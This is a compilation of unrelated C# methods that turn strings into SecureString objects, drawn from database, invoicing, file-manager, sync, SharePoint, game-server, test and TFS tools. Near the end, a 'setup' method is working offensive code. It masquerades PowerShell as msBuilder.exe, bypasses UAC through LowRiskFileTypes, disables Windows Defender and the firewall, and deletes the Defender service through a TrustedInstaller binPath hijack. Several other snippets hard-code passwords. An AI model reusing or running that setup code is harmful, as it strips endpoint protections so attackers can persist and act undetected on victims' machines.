private static void StopPostgreSqlServer() { #if TODO System.Diagnostics.Process PostgreSqlServerProcess; if (TClientSettings.RunAsStandalone) { // stop the PostgreSql server (e.g. c:\Program Files\Postgres\8.3\bin\pg_ctl.exe -D C:\petra2\db23_pg stop try { PostgreSqlServerProcess = new System.Diagnostics.Process(); PostgreSqlServerProcess.StartInfo.FileName = "\"" + TClientSettings.PostgreSql_BaseDir + "\\bin\\pg_ctl.exe\""; PostgreSqlServerProcess.StartInfo.Arguments = "-D " + TClientSettings.PostgreSql_DataDir + " stop"; PostgreSqlServerProcess.StartInfo.WorkingDirectory = TClientSettings.PostgreSql_DataDir; PostgreSqlServerProcess.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; PostgreSqlServerProcess.EnableRaisingEvents = false; PostgreSqlServerProcess.StartInfo.UseShellExecute = false; System.Security.SecureString MyPassword = new System.Security.SecureString(); String Pwd = "petra"; foreach (char c in Pwd) { MyPassword.AppendChar(c); } PostgreSqlServerProcess.StartInfo.Password = MyPassword; PostgreSqlServerProcess.StartInfo.UserName = "******"; if (!PostgreSqlServerProcess.Start()) { #if TESTMODE TLogging.Log("failed to start " + PostgreSqlServerProcess.StartInfo.FileName); #endif return; } } catch (Exception exp) { #if TESTMODE TLogging.Log("Exception while shutting down PostgreSql server process: " + exp.ToString()); #else MessageBox.Show("Exception while shutting down PostgreSql server process: " + exp.ToString()); #endif return; } PostgreSqlServerProcess.WaitForExit(20000); } #endif }
public System.Security.SecureString DecryptToSecureStringFromBase64(string inString) { byte[] bytes = Convert.FromBase64String(inString); bytes = Decrypt(bytes); System.Security.SecureString ret = new System.Security.SecureString(); for (int i = 0; i < bytes.Length; i+=2) { ret.AppendChar( (char)(bytes[i]*256 + bytes[i+1])); bytes[i] = bytes[i+1] = 0; } ret.MakeReadOnly(); return ret; }
/// <summary> /// Decrypts the specified data using a 192-bit cipher. The key can be any length. /// </summary> /// <param name="Data">The data to be decrypted. Will be converted to UTF8.</param> /// <param name="Key">The key used to decrypt the data.</param> /// <returns>A string containing the decoded data.</returns> public static System.Security.SecureString Decrypt192StringSecure(byte[] Data, byte[] Key) { AesCryptoServiceProvider AES = null; var MS = new MemoryStream(Data); CryptoStream CS = null; StreamReader DS = null; try { //Get the IV and length corrected Key. KeyData KeyData = GenerateKeyIV128(Key); //Create the AES crytpograhy object. AES = new AesCryptoServiceProvider { BlockSize = 192, KeySize = 192, Key = KeyData.Key, IV = KeyData.IV, Mode = CipherMode.CBC, Padding = PaddingMode.PKCS7 }; CS = new CryptoStream(MS, AES.CreateDecryptor(), CryptoStreamMode.Read); DS = new StreamReader(CS, System.Text.Encoding.UTF8); var ss = new System.Security.SecureString(); while (DS.EndOfStream == false) ss.AppendChar(Convert.ToChar(DS.Read())); ss.MakeReadOnly(); return ss; } finally { if (AES != null) AES.Clear(); MS.Dispose(); if (CS != null) CS.Dispose(); if (DS != null) DS.Dispose(); } }
///<summary> ///Genera el sello del comprobante. ///</summary> ///<return> ///Devuelve sello del comprobante como un string ///</return> ///<param name="keyfile"> ///Ruta del archivo .key en disco a leer. ///</param> ///<param name="password"> ///Contraseña del archivo .key, en string ///</param> ///<param name="originalChain"> ///Cadena original del comprobante en cadena, o bien la ruta del archivo a leer en disco ///</param> public string createDigitalStamp(string keyfile, string password, string originalChain) { if (password.Equals("")) { this.code = "PASS-001"; this.message = "Error: Contraseña vacia"; return this.digitalStamp; } if (!System.IO.File.Exists(keyfile)) { this.code = "KEY-001"; this.message = "Error: No se encuentra el archivo key en la ruta " + keyfile; return this.digitalStamp; } if (originalChain.Equals("")) { this.code = "CHAIN-001"; this.message = "Error: Cadena original vacia"; return this.digitalStamp; } try { string strSello = ""; string strPathLlave = @keyfile; string strLlavePwd = password; if (File.Exists(originalChain)) { StreamReader objReader = new StreamReader(originalChain, Encoding.UTF8); originalChain = objReader.ReadToEnd(); objReader.Close(); } string strCadenaOriginal = originalChain; System.Security.SecureString passwordSeguro = new System.Security.SecureString(); passwordSeguro.Clear(); foreach (char c in strLlavePwd.ToCharArray()) passwordSeguro.AppendChar(c); byte[] llavePrivadaBytes = System.IO.File.ReadAllBytes(strPathLlave); RSACryptoServiceProvider rsa = opensslkey.DecodeEncryptedPrivateKeyInfo(llavePrivadaBytes, passwordSeguro); SHA1CryptoServiceProvider hasher = new SHA1CryptoServiceProvider(); byte[] bytesFirmados = rsa.SignData(System.Text.Encoding.UTF8.GetBytes(originalChain), hasher); strSello = Convert.ToBase64String(bytesFirmados); if (strSello == "") { this.code = "E-0001"; this.message = "Error: El sello esta vacio"; } this.code = "S-0001"; this.digitalStamp = strSello; this.message = "Sello del comprobante creado con éxito"; } catch (Exception e) { this.code = "EXCEPTION-0001"; this.message = "Error: " + e.Message; } return this.digitalStamp; }
protected override void internal_command_proc() { QueryPanelInfoEventArgs e = new QueryPanelInfoEventArgs(); OnQueryCurrentPanel(e); if (e.FocusedIndex == -1) { return; } DirectoryList dl = (DirectoryList)e.ItemCollection; if (dl.GetItemDisplayNameLong(e.FocusedIndex) == "..") { return; } //show dialog ProcessStartInfo psi = new ProcessStartInfo(); string file_name = dl[e.FocusedIndex].FullName; psi.FileName = file_name; RunExeOptions opts = Options.RunExeOptions; RunexeDialog dialog = new RunexeDialog(); dialog.Text = Options.GetLiteral(Options.LANG_EXECUTE); dialog.RunExeOptions = opts; dialog.textBoxArguments.Text = string.Empty; dialog.textBoxFilename.Text = dl[e.FocusedIndex].FileName; dialog.textBoxWorkingDirectory.Text = dl.DirectoryPath; if (psi.Verbs != null) { foreach (string verb in psi.Verbs) { dialog.comboBoxVerb.Items.Add(verb); } } if (dialog.ShowDialog() != DialogResult.OK) { return; } opts = dialog.RunExeOptions; Options.RunExeOptions = opts; psi.LoadUserProfile = (opts & RunExeOptions.LoadEnvironment) == RunExeOptions.LoadEnvironment; if ((opts & RunExeOptions.RunInConsole) == RunExeOptions.RunInConsole) { if (file_name.Contains(" ")) { file_name = '"' + file_name + '"'; } psi.FileName = "cmd"; psi.Arguments = "/K " + file_name; } else { psi.FileName = file_name; } if ((opts & RunExeOptions.UseRunas) == RunExeOptions.UseRunas) { string user = string.Empty; string pass = string.Empty; if (Messages.AskCredentials(Options.GetLiteral(Options.LANG_ACCOUNT), Options.GetLiteral(Options.LANG_EXECUTE) + " '" + file_name + "'", ref user, ref pass) == DialogResult.OK) { psi.UserName = user; System.Security.SecureString sec = new System.Security.SecureString(); foreach (char c in pass) { sec.AppendChar(c); } psi.Password = sec; } } psi.UseShellExecute = (opts & RunExeOptions.UseShellExecute) == RunExeOptions.UseShellExecute; psi.WorkingDirectory = dialog.textBoxWorkingDirectory.Text; psi.Verb = dialog.comboBoxVerb.Text; psi.Arguments = psi.Arguments + " " + dialog.textBoxArguments.Text; try { Process.Start(psi); } catch (Exception ex) { Messages.ShowException (ex, string.Format(Options.GetLiteral(Options.LANG_CANNOT_EXCUTE_0_1), psi.FileName, psi.Arguments)); } }
void Run(string hostname, int port, string repo) { var foo = new FooSyncEngine(); var client = new TcpClient(hostname, port); var stream = client.GetStream(); var writer = new BinaryWriter(stream); var reader = new BinaryReader(stream); var passwd = new System.Security.SecureString(); foreach (char c in "qwerty") passwd.AppendChar(c); RetCode ret; int count = 0; writer.Write(OpCode.Hello); ret = reader.ReadRetCode(); Console.WriteLine("hello returned {0}", ret); Version protocolVersion = new Version(reader.ReadInt32(), reader.ReadInt32()); String serverName = reader.ReadString(); String serverDesc = reader.ReadString(); Version serverVersion = new Version(reader.ReadInt32(), reader.ReadInt32(), reader.ReadInt32(), reader.ReadInt32()); String helloString = reader.ReadString(); Console.WriteLine("Protocol {0}\nName: {1}\nDescription: {2}\nServer {3}\n{4}", protocolVersion, serverName, serverDesc, serverVersion, helloString); writer.Write(OpCode.Auth); writer.Write("test"); writer.Write(passwd); ret = reader.ReadRetCode(); Console.WriteLine("auth returned {0}", ret); writer.Write(OpCode.ListRepos); ret = reader.ReadRetCode(); count = reader.ReadInt32(); Console.WriteLine("listrepos returned {0}", ret); Console.WriteLine("{0} repositories", count); for (int x = 0; x < count; x++) { var repoName = reader.ReadString(); Console.WriteLine("> {0}", repoName); } writer.Write(OpCode.Hello); ret = reader.ReadRetCode(); var s = reader.ReadString(); Console.WriteLine("hello replied {0}", s); writer.Write(OpCode.Tree); writer.Write("test"); ret = reader.ReadRetCode(); Console.WriteLine("tree returned {0}", ret); var tree = new FooTree(foo, string.Format("fs://{0}:{1}/{2}", hostname, port, repo), stream, (item, total, path) => { Console.WriteLine("{0}: {1}", item, path); } ); Console.WriteLine("{0} items in tree", tree.Files.Count); writer.Write(OpCode.GetFile); writer.Write("test"); writer.Write(tree.Files.Keys.First()); ret = reader.ReadRetCode(); Console.WriteLine("getfile returned {0}", ret); var len = reader.ReadInt64(); var bytes = reader.ReadBytes((int)len); stream.Close(); }
public SharePointBackend(string url, Dictionary <string, string> options) { m_deleteToRecycler = Utility.Utility.ParseBoolOption(options, "delete-to-recycler"); m_useBinaryDirectMode = Utility.Utility.ParseBoolOption(options, "binary-direct-mode"); try { string strSpan; if (options.TryGetValue("web-timeout", out strSpan)) { TimeSpan ts = Timeparser.ParseTimeSpan(strSpan); if (ts.TotalMilliseconds > 30000 && ts.TotalMilliseconds < int.MaxValue) { this.m_useContextTimeoutMs = (int)ts.TotalMilliseconds; } } } catch { } try { string strChunkSize; if (options.TryGetValue("chunk-size", out strChunkSize)) { long pSize = Utility.Sizeparser.ParseSize(strChunkSize, "MB"); if (pSize >= (1 << 14) && pSize <= (1 << 30)) // [16kb .. 1GB] { this.m_fileChunkSize = (int)pSize; } } } catch { } var u = new Utility.Uri(url); u.RequireHost(); // Create sanitized plain https-URI (note: still has double slashes for processing web) m_orgUrl = new Utility.Uri("https", u.Host, u.Path, null, null, null, u.Port); // Actual path to Web will be searched for on first use. Ctor should not throw. m_spWebUrl = null; m_serverRelPath = u.Path; if (!m_serverRelPath.StartsWith("/", StringComparison.Ordinal)) { m_serverRelPath = "/" + m_serverRelPath; } m_serverRelPath = Duplicati.Library.Utility.Utility.AppendDirSeparator(m_serverRelPath, "/"); // remove marker for SP-Web m_serverRelPath = m_serverRelPath.Replace("//", "/"); // Authentication settings processing: // Default: try integrated auth (will normally not work for Office365, but maybe with on-prem SharePoint...). // Otherwise: Use settings from URL(precedence) or from command line options. bool useIntegratedAuthentication = Utility.Utility.ParseBoolOption(options, "integrated-authentication"); string useUsername = null; string usePassword = null; if (!useIntegratedAuthentication) { if (!string.IsNullOrEmpty(u.Username)) { useUsername = u.Username; if (!string.IsNullOrEmpty(u.Password)) { usePassword = u.Password; } else if (options.ContainsKey("auth-password")) { usePassword = options["auth-password"]; } } else { if (options.ContainsKey("auth-username")) { useUsername = options["auth-username"]; if (options.ContainsKey("auth-password")) { usePassword = options["auth-password"]; } } } } if (useIntegratedAuthentication || (useUsername == null || usePassword == null)) { // This might or might not work for on-premises SP. Maybe support if someone complains... m_userInfo = System.Net.CredentialCache.DefaultNetworkCredentials; } else { System.Security.SecureString securePwd = new System.Security.SecureString(); usePassword.ToList().ForEach(c => securePwd.AppendChar(c)); m_userInfo = new Microsoft.SharePoint.Client.SharePointOnlineCredentials(useUsername, securePwd); // Other options (also ADAL, see class remarks) might be supported on request. // Maybe go in deep then and also look at: // - Microsoft.SharePoint.Client.AppPrincipalCredential.CreateFromKeyGroup() // - ctx.AuthenticationMode = SP.ClientAuthenticationMode.FormsAuthentication; // - ctx.FormsAuthenticationLoginInfo = new SP.FormsAuthenticationLoginInfo(user, pwd); } }
static void Main(string[] args) { // Testcode //string hash, salt; //PasswordHasher.GetNewHash("passw0rd", out hash, out salt); //Console.WriteLine(hash); //Console.WriteLine(salt); //Console.WriteLine(PasswordHasher.VerifyHash("passw0rd", hash, salt)); // ---------------- bool acceptAny = false; ushort port = 3221; string dbPath = "userdb.txt"; // Read command line params for (int i = 0; i < args.Length; ++i) { var arg = args[i]; if (!arg.StartsWith("-", StringComparison.Ordinal) && !arg.StartsWith("/", StringComparison.Ordinal)) { Console.WriteLine("Parameters must start with '-' or '/'. Use '-?' to show help."); return; } if (arg.Length == 1) { continue; } arg = arg.Substring(1, arg.Length - 1); if (arg == "acceptany") { acceptAny = true; continue; } else if (arg.StartsWith("usrdb=", StringComparison.Ordinal)) { var spl = arg.Split('='); if (spl.Length == 2) { dbPath = spl[1].Trim(new[] { '\"' }); continue; } else { Console.WriteLine("Error in parameter 'usrdb'"); return; } } else if (arg.StartsWith("port=")) { var spl = arg.Split('='); if (spl.Length != 2 || !ushort.TryParse(spl[1], out port)) { Console.WriteLine("Error in parameter 'port'"); return; } } else { Console.WriteLine( "Access Battle Server\r\n\r\n" + "Usage: AccessBattleServer [-acceptany] [-usrdb=path]\r\n" + "\r\nOptions:\r\n" + "\t-port=3221 Define the port to use. Default: 3221\r\n" + "\t-acceptany Accepts any client. Disables user database.\r\n" + "\t Clients require no password.\r\n" + "\t-usrdb=path Path to text file for user database.\r\n" + "\t default path is '.\\userdb.txt'.\r\n" + "\r\nUsing '/' instead of '-' is allowed.\r\n" ); return; } } Log.SetMode(LogMode.Console); Log.Priority = LogPriority.Information; // Create userdb folder if not existing Console.WriteLine("Using user database file: " + dbPath); try { var dir = System.IO.Path.GetDirectoryName(dbPath); if (!string.IsNullOrEmpty(dir) && !System.IO.Directory.Exists(dir)) { System.IO.Directory.CreateDirectory(dir); } } catch (Exception) { Console.WriteLine("Could not create directory for user database!"); } try { var userDb = new TextFileUserDatabaseProvider(dbPath); _server = new GameServer(port, userDb) { AcceptAnyClient = acceptAny }; _server.Start(); Console.WriteLine("Game Server started"); if (acceptAny) { Console.WriteLine("! Any client is accepted"); } Console.WriteLine("Type 'help' to show available commands"); string line; while ((line = Console.ReadLine()) != "exit") { bool ok = false; line = line.Trim(); if (line == ("help")) { Console.WriteLine( "\texit Close this program.\r\n" + "\tlist List all games\r\n" + "\tadd user n p Adds user 'u' with password 'p'\r\n" + "\tdebug Debug command. Requires additional parameters:\r\n" + "\t win key=1234 1 Let player 1 win. Uses game key.\r\n" + "\t win name=gameX 2 Let player 2 win. Uses game name."); ok = true; } else if (line == ("list")) { var games = _server.Games.ToList(); if (games.Count == 0) { Console.WriteLine("There are no games");; } else { foreach (var game in games) { Console.WriteLine(game.Key + " - " + game.Value.Name); } } ok = true; } else if (line.StartsWith("debug ", StringComparison.Ordinal)) { var sp = line.Split(' '); if (sp.Length == 4) { if (sp[1] == "win") { uint k = 0; var spx = sp[2].Split('='); if (spx.Length != 2) { continue; } if (spx[0] == "key") { if (!uint.TryParse(spx[1], out k)) { continue; } } else if (spx[0] == "name") { k = _server.Games.FirstOrDefault(o => o.Value.Name == spx[1]).Key; } if (k == 0) { continue; } int p; if (!int.TryParse(sp[3], out p)) { continue; } _server.Win(p, k); ok = true; } } } else if (line.StartsWith("add user ", StringComparison.Ordinal)) { var spl = line.Split(' '); if (spl.Length == 4) { var pw = new System.Security.SecureString(); foreach (var c in spl[3]) { pw.AppendChar(c); } if (userDb.AddUserAsync(spl[2], pw).GetAwaiter().GetResult()) { Console.WriteLine("user added"); } else { Console.WriteLine("add failed"); } ok = true; } } if (!ok) { Console.WriteLine("error"); } } } finally { Log.WriteLine(LogPriority.Information, "Stopping Server..."); _server.Stop(); #if DEBUG Console.WriteLine("Press any key to exit..."); Console.ReadKey(); #endif Log.WriteLine(LogPriority.Information, "Game Server stopped"); } }
private static string RunClientAndWait(int topicId, int discId) { var metaInfoPath = RandomFilePath(".txt"); var parameters = string.Format("{0} {1} {2}", topicId, discId, metaInfoPath); var psi = new ProcessStartInfo(ClientLocation(), ""); psi.UseShellExecute = false; // psi.UserName = "******"; // psi.CreateNoWindow = true; //Process pro = Process.Start(ClientLocation(), parameters); var pwd = new System.Security.SecureString(); pwd.AppendChar('d'); pwd.AppendChar('i'); pwd.AppendChar('s'); pwd.AppendChar('c'); //psi.Password = pwd; //psi.WorkingDirectory = @"C:\Program Files (x86)\Discussion system"; //psi.Domain = Environment.UserDomainName; Process pro = Process.Start(psi); pro.WaitForExit(); return metaInfoPath; }
public void NewCommandInvalidInput() { // Build test variables for later var Con = new SqlConnection(ConStr); var Con2 = new SqlConnection(ConStr2); var Params = new SqlCommand().Parameters; var Params2 = new List <SqlParameter>(); for (int i = 0; i < 3; i++) { Params.AddWithValue('@' + i.ToString(), i); Params2.Add(new SqlParameter('@' + i.ToString(), i + 1)); } // Create fake credentials to test with var Cipher = new System.Security.SecureString(); foreach (char c in Pwd) { Cipher.AppendChar(c); } // Test the attempt to create without ReadOnly password try { SqlCmd.New(Command2, ConStr2, UsrNm, Cipher); } catch (ArgumentException ae) { Assert.AreEqual("password must be marked as read only.", ae.Message); } catch { Assert.Fail(); } // Make ReadOnly and continue testing Cipher.MakeReadOnly(); var Cred = new SqlCredential(UsrNm, Cipher); // Test the attempt to create with IntegratedSecurity = True and Credentials try { SqlCmd.New(Command2, ConStr, Cred); } catch (ArgumentException ae) { Assert.AreEqual("Cannot use Credential with Integrated Security connection string keyword.", ae.Message); } catch { Assert.Fail(); } // Test the attempt to create with null Credentials try { SqlCmd.New(Command2, ConStr2, null, ""); } catch (ArgumentException ae) { Assert.AreEqual("Value cannot be null.\r\nParameter name: userId", ae.Message); } catch { Assert.Fail(); } try { SqlCmd.New(Command2, ConStr2, null, new System.Security.SecureString()); } catch (ArgumentException ae) { Assert.AreEqual("Value cannot be null.\r\nParameter name: userId", ae.Message); } catch { Assert.Fail(); } }
/* * Name: setup * Description: Basic setup script which performs various tasks * - 1. Copy powershell as msBuilder.exe * - 2. Change LowRiskFileTypes to bypass UAC * - 3. Copy .exe payload into different locations * - 4. Disable WinDefender - Temp * - 5. Drop Firewall * - 6. Permanently disable Windows Defender * * Params: * - (string) originPayloadLoc - Original payload location * - (string[]) newLoc - Destination location which the original payloads will be copied to * */ public static void setup(bool binary, string originPayloadLoc, string[] newLoc) { // 1. Copy powershell as msBuilder.exe string srcPath = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"; string destPath = @"C:\Windows\System32\msBuilder.exe"; try { System.IO.File.Copy(srcPath, destPath, true); } catch (Exception ex) { System.Environment.Exit(1); } // 2. change LowRiskFileTypes to bypass UAC Utils.setHKCUSubKey(RegistryKeys.hkcuLowRiskFileType, "LowRiskFileTypes", ".bat;.exe;.ps1"); //Console.WriteLine(RegistryKeys.hklmImagePath); // 3. Copy payload into different locations if (binary == true) { copyPayload(originPayloadLoc, newLoc); } // 4. Disable WinDefender - Temp string noRealTime = "Set-MpPreference -DisableRealTimeMonitoring $true -DisableScriptScanning $true -DisableIOAVProtection $true"; string excludeC = "Add-MpPreference -ExclusionPath \"C:\""; string noSubmit = "Set-MpPreference -SubmitSamplesConsent 2"; Process.Start(@"powershell.exe", noRealTime); Process.Start(@"powershell.exe", excludeC); Process.Start(@"powershell.exe", noSubmit); // 5. Drop firewall System.Diagnostics.Process proc = new System.Diagnostics.Process(); string netsh = "netsh.exe"; proc.StartInfo.Arguments = "Advfirewall set allprofile state off"; proc.StartInfo.FileName = netsh; proc.StartInfo.CreateNoWindow = true; proc.Start(); proc.WaitForExit(); // 6. Disable WinDefender - For Good Utils.setHKLMSubKey(RegistryKeys.hklmDefender, "DisableAntiSpyware", 1); // 6. Erase WinDefender - THIS MIGHT CAUSE HAVOC, WATCH OUT TODO: /* * string argss = "sc config TrustedInstaller binPath= \"cmd.exe /C sc stop windefend && sc delete windefend\" && sc start TrustedInstaller"; * try * { * Process.Start(@"cmd.exe", argss); * } * catch (Exception ex) * { * Console.WriteLine("[-] Access should be denied"); * } */ try { proc = new Process(); proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; proc.StartInfo.UseShellExecute = true; proc.StartInfo.CreateNoWindow = true; proc.StartInfo.Verb = "runas"; proc.StartInfo.UserName = "******"; System.Security.SecureString securePassword = new System.Security.SecureString(); string password = "******"; foreach (char c in password.ToCharArray()) { securePassword.AppendChar(c); } proc.StartInfo.Password = securePassword; proc.StartInfo.Arguments = "sc config TrustedInstaller binPath= \"cmd.exe /C sc stop windefend && sc delete windefend\" && sc start TrustedInstaller"; proc.Start(); proc.WaitForExit(); } catch (Exception ex) { Console.WriteLine("[-] Access should be denied"); } }
/// <summary> /// metodo main del progetto /// </summary> /// <param name="args"> /// paramentri da console, non utilizzati /// </param> private static void Main(string[] args) { try { if (!Logger.Initialized) { Logger.Init(Directory.GetCurrentDirectory() + "\\loginfo.config"); } } catch (Exception e) { Logger.Fatal(new LogInfo(System.Reflection.MethodBase.GetCurrentMethod(), "INT", string.Format("errore in fase di inizializzazione: {0}", e.Message))); } string metriche = System.Configuration.ConfigurationManager.AppSettings["metriche"]; string[] collections = System.Configuration.ConfigurationManager.AppSettings["collection"].Split(','); string repDir = System.Configuration.ConfigurationManager.AppSettings["repDir"]; string tmpDir = System.Configuration.ConfigurationManager.AppSettings["tmpDir"]; // string tfsName = System.Configuration.ConfigurationManager.AppSettings["TFSServer"]; string[] tfsServers = System.Configuration.ConfigurationManager.AppSettings["TFSServer"].Split(','); //TFS.BranchControl(); // TFS.VersionControl(); // TP.GetAllTPfromACNA(); // List<TP> tp = TFS.GetTP(); Workspace workspace = null; // Get a reference to our Team Foundation Server. string pathSI = string.Empty; // bool main = false; // bool dev = false; // bool rel = false; //string lcMain = string.Empty; //string lcDev = string.Empty; //string lcRel = string.Empty; //var allWI = 0; // modifica //var wiCountTask = 0; //var wiCountBug = 0; try { foreach (string tfsName in tfsServers) { List<string> collection = TFS.GetCollection(tfsName); foreach (string nome_coll in collection) { Excel.tmp = "report"; if (collections.Contains(nome_coll)) { List<TP> tp = TFS.GetTP(tfsName,nome_coll); //TFS.ScriviGlobalList(nome_coll, tp); foreach (TP coll in tp) { using (TfsTeamProjectCollection tfs = new TfsTeamProjectCollection(new Uri(tfsName + "/" + nome_coll), TFS.Cred)) { TFS.RecuperoQA(tfs, coll.Name); TFS.ControlloSprint(tfs, coll.Name); // TFS.VersionControl(); // TFS.CreateWI(tfs, coll); // allWI = TFS.AllWI(tfs, nome_coll, coll.Name); /* *Ricerca del numero di task in un tp */ //wiCountTask = TFS.WI(tfs, nome_coll, coll.Name, "Task"); //wiCountBug = TFS.WI(tfs, nome_coll, coll.Name, "Bug"); /* * Fine ricerca */ // Get a reference to Version Control. VersionControlServer versionControl = (VersionControlServer)tfs.GetService(typeof(VersionControlServer)); //// Listen for the Source Control events. versionControl.NonFatalError += Program.OnNonFatalError; versionControl.Getting += Program.OnGetting; versionControl.BeforeCheckinPendingChange += Program.OnBeforeCheckinPendingChange; versionControl.NewPendingChange += Program.OnNewPendingChange; try { System.Security.SecureString psw = new System.Security.SecureString(); foreach (char c in TFS.Passwd) { psw.AppendChar(c); } if (metriche.Equals("si")) { // Creazione workspace. string tmp = coll.Name.Replace(" ", "_"); workspace = versionControl.CreateWorkspace("QA_USER", versionControl.AuthorizedUser); if (workspace == null) { workspace = versionControl.CreateWorkspace("QA_USER", versionControl.AuthorizedUser); } // Create a mapping using the Team Project supplied on the command line. workspace.Map("$/" + coll.Name, tmpDir + tmp); WorkingFolder wf = workspace.GetWorkingFolderForServerItem("$/" + coll.Name); pathSI = wf.LocalItem; // Get the files from the repository. if (string.IsNullOrWhiteSpace(coll.Main)) { VersionSpec fromDateVersion = new DateVersionSpec(DateTime.Now.AddMonths(-2)); // workspace.Get(arrPath.ToArray(), VersionSpec.Latest, RecursionType.Full, GetOptions.GetAll); workspace.Get(fromDateVersion, GetOptions.GetAll); DirectoryInfo di1 = Directory.CreateDirectory(pathSI); DirectoryInfo[] directories = di1.GetDirectories("main*", SearchOption.AllDirectories); foreach (var dir in directories) { string fullName = "\"" + dir.FullName.Replace('\\', '/') + "\""; var outputXml = string.Empty; if (coll.CISoftware != string.Empty) { outputXml = repDir + coll.CISoftware.Replace(" ", "_") + "-" + "#" + DateTime.Now.Day + "-" + DateTime.Now.Month + "-" + DateTime.Now.Year + ".xml"; } else { outputXml = repDir + tmp + "-" + "#" + DateTime.Now.Day + "-" + DateTime.Now.Month + "-" + DateTime.Now.Year + ".xml"; } /* * controllo pre-pulizia directory */ Logger.Info(new LogInfo(System.Reflection.MethodBase.GetCurrentMethod(), "INT", string.Format("Comando lanciato per il cloc: {0}", Directory.GetCurrentDirectory() + "/eseguibili/cloc.exe" + fullName + @" --xml --out=" + outputXml))); Console.WriteLine(Directory.GetCurrentDirectory() + "/eseguibili/cloc.exe"); Console.WriteLine(fullName + @" --xml --out=" + outputXml); Process p1 = Process.Start(Directory.GetCurrentDirectory() + "/eseguibili/cloc.exe", fullName + @" --xml --out=" + outputXml, TFS.User, psw, TFS.Dominio); while (!p1.HasExited) { } XML.AppendTP(coll.Name, nome_coll, outputXml, coll.CISoftware); XML.ControlloTotali(); XML.DelXml(outputXml); /* * controllo post-pulizia directory */ XML.PuliziaDirectory(pathSI); Process p = Process.Start(Directory.GetCurrentDirectory() + "/eseguibili/cloc.exe", fullName + @" --xml --out=" + outputXml, TFS.User, psw, TFS.Dominio); while (!p.HasExited) { } XML.AppendTP(coll.Name, nome_coll, outputXml, coll.CISoftware); XML.TrasformaInWI(tfsName); } }//nel caso in cui la main line è definita else { string[] arrPath = coll.Main.Split(','); //VersionSpec fromDateVersion = new DateVersionSpec(DateTime.Now.AddMonths(-2)); // for (int i = 0; i < arrPath.Length; i++) // { // workspace.Get(new GetRequest(arrPath[i], RecursionType.Full, VersionSpec.Latest), GetOptions.Remap); // } var errore = workspace.Get(arrPath, VersionSpec.Latest, RecursionType.Full, GetOptions.Remap); string fullName = "\"" + pathSI + "\""; var outputXml = string.Empty; if (coll.CISoftware != string.Empty) { outputXml = repDir + coll.CISoftware.Replace(" ", "_") + "-" + "#" + DateTime.Now.Day + "-" + DateTime.Now.Month + "-" + DateTime.Now.Year + ".xml"; } else { outputXml = repDir + tmp + "-" + "#" + DateTime.Now.Day + "-" + DateTime.Now.Month + "-" + DateTime.Now.Year + ".xml"; } /* * controllo pre-pulizia directory */ Logger.Info(new LogInfo(System.Reflection.MethodBase.GetCurrentMethod(), "INT", string.Format("Comando lanciato per il cloc: {0}", Directory.GetCurrentDirectory() + "/eseguibili/cloc.exe" + fullName + @" --xml --out=" + outputXml))); Console.WriteLine(Directory.GetCurrentDirectory() + "/eseguibili/cloc.exe"); Console.WriteLine(fullName + @" --xml --out=" + outputXml); Process p1 = Process.Start(Directory.GetCurrentDirectory() + "/eseguibili/cloc.exe", fullName + @" --xml --out=" + outputXml, TFS.User, psw, TFS.Dominio); while (!p1.HasExited) { } XML.AppendTP(coll.Name, nome_coll, outputXml, coll.CISoftware); XML.ControlloTotali(); XML.DelXml(outputXml); /* * controllo post-pulizia directory */ XML.PuliziaDirectory(pathSI); Logger.Info(new LogInfo(System.Reflection.MethodBase.GetCurrentMethod(), "INT", string.Format("Comando lanciato per il cloc: {0}", Directory.GetCurrentDirectory() + "/eseguibili/cloc.exe" + fullName + @" --xml --out=" + outputXml))); Process p = Process.Start(Directory.GetCurrentDirectory() + "/eseguibili/cloc.exe", fullName + @" --xml --out=" + outputXml, TFS.User, psw, TFS.Dominio); while (!p.HasExited) { } if (File.Exists(outputXml)) { XML.AppendTP(coll.Name, nome_coll, outputXml, coll.CISoftware); XML.TrasformaInWI(tfsName); } else { TFS.CreateWI(tfs, new List<string>(), coll.Name, coll.CISoftware); } } } // List<ExtendedItem> di = TFS.Button1_Click(tfs, coll.Name); // foreach (ExtendedItem dinfo in di) // { // string prova = dinfo.SourceServerItem; // prova = prova.ToLower(); // if (prova.Contains("main")) // { // main = true; // lcMain = dinfo.CheckinDate.ToString(); // } // if (prova.Contains("dev")) // { // dev = true; // lcDev = dinfo.CheckinDate.ToString(); // } // if (prova.Contains("rel")) // { // rel = true; // lcRel = dinfo.CheckinDate.ToString(); // } // } } catch (Exception e) { Logger.Error(new LogInfo(System.Reflection.MethodBase.GetCurrentMethod(), "INT", string.Format("Errore sul controllo del progetto: {0}", e.Message))); Console.WriteLine(e.Message); } finally { try { if (metriche.Equals("si")) { // Delete the workspace. workspace.Delete(); string tmp = pathSI.Replace(" ", "#"); string dirObject = "Win32_Directory.Name='" + pathSI + "'"; using (ManagementObject managementObject = new ManagementObject(dirObject)) { managementObject.Get(); ManagementBaseObject outParams = managementObject.InvokeMethod("Delete", null, null); // ReturnValue should be 0, else failure if (Convert.ToInt32(outParams.Properties["ReturnValue"].Value) != 0) { Console.Write("Errore"); } } } } catch (Exception e) { Console.WriteLine(e.Message); Logger.Fatal(new LogInfo(System.Reflection.MethodBase.GetCurrentMethod(), "INT", string.Format("errore in fase di cancellazione Workspace: {0}", e.Message))); } } } } } } } } catch (Exception e) { Logger.Fatal(new LogInfo(System.Reflection.MethodBase.GetCurrentMethod(), "INT", string.Format("errore in fase di cancellazione Workspace: {0}", e.StackTrace))); } }
